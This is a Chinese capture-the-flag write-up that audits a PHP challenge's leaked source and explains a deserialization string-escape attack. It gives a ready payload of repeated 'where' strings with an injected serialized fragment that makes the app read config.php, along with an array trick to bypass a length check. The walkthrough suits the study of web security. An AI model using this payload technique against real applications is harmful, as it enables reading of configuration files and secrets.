偷了三天懒没有学习,哈哈哈,通宵看完了扫黑风暴
开始做题
打开环境,第一时间以为是SQL注入,用sqlmap跑了一下,并不是
找了一下也没有什么东西,就去扫一下他的敏感目录,扫到www.zip,下载下来
先用Seay快速审计一下,再去细看代码逻辑
知识点
1、代码审计
2、反序列化逃逸
来一起看看代码吧
先看看可能存在文件读取的profile.php
首先想到的就是利用反序列化,然后文件读取,继续跟进
$profile = $user->show_profile($username);
再看index.php
,就是正常登录
再看update.php
,这里就存在文件上传了,而且注意到nickname
其实是可控的,因为strlen
是可以通过数组绕过长度的,而另外两个 if 判断是被写死了的
继续看class.php
,主要还是利用update_profile
和filter
我们需要的flag
就在 config.php
里
整理一下思路
profile.php
$profile = unserialize($profile);
$phone = $profile['phone'];
$email = $profile['email'];
$nickname = $profile['nickname'];
$photo = base64_encode(file_get_contents($profile['photo']));
假如我们想办法让$profile['photo']
等于config.php
,是不是就可以通过文件读取拿到flag
update.php
if (preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
die('Invalid nickname');
move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));
$profile['phone'] = $_POST['phone'];
$profile['email'] = $_POST['email'];
$profile['nickname'] = $_POST['nickname'];
$profile['photo'] = 'upload/' . md5($file['name']);
$user->update_profile($username, serialize($profile));
echo 'Update Profile Success!<a href="profile.php">Your Profile</a>';
这里我们就可以通过nickname
来控制photo
的值,从而造成逃逸
简单介绍一下逃逸的原理
比如说正常序列化后的语句是
a:4:{s:5:"phone";s:11:"15901010101";s:5:"email";s:11:"123@123.com";s:8:"nickname";s:3:"asf";s:5:"photo";s:6:"11.jpg";};
但是如果我的nickname
是asf";s:5:"photo";s:10:"config.php";};
而不只是asf
,通过序列化又会变成什么呢
a:4:{s:5:"phone";s:11:"15901010101";s:5:"email";s:11:"123@123.com";s:8:"nickname";s:37:"asf";s:5:"photo";s:10:"config.php";};";s:5:"photo";s:6:"11.jpg";}
有没有注意到差别,我们传进去是nickname已经形成闭合,同时也把我们构造的config.php
插进去了,而后面的photo
部分则会丢失,反序列化时就形成了逃逸
回到题目
update_profile
又调用filter
方法检测过滤
public function filter($string)
{
$escape = array('\'', '\\\\');
$escape = '/' . implode('|', $escape) . '/';
$string = preg_replace($escape, '_', $string);
$safe = array('select', 'insert', 'update', 'delete', 'where');
$safe = '/' . implode('|', $safe) . '/i';
return preg_replace($safe, 'hacker', $string);
}
我们的想法就是要插入";}s:5:"photo";s:10:"config.php";}
,一共34个字符,要逃逸成功只需要长度增加34,把我们的目标给挤出去就行了
这里正好利用filter
来将长度增长,假如我传入 where,那么被替换以后就是 hacker,长度增加了1
payload,一共是34个 where
wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}
开始做题
首先抓个包,strlen可以通过数组绕过
上传成功,访问profile.php
,这个图片就是config.php
,base64解码拿到flag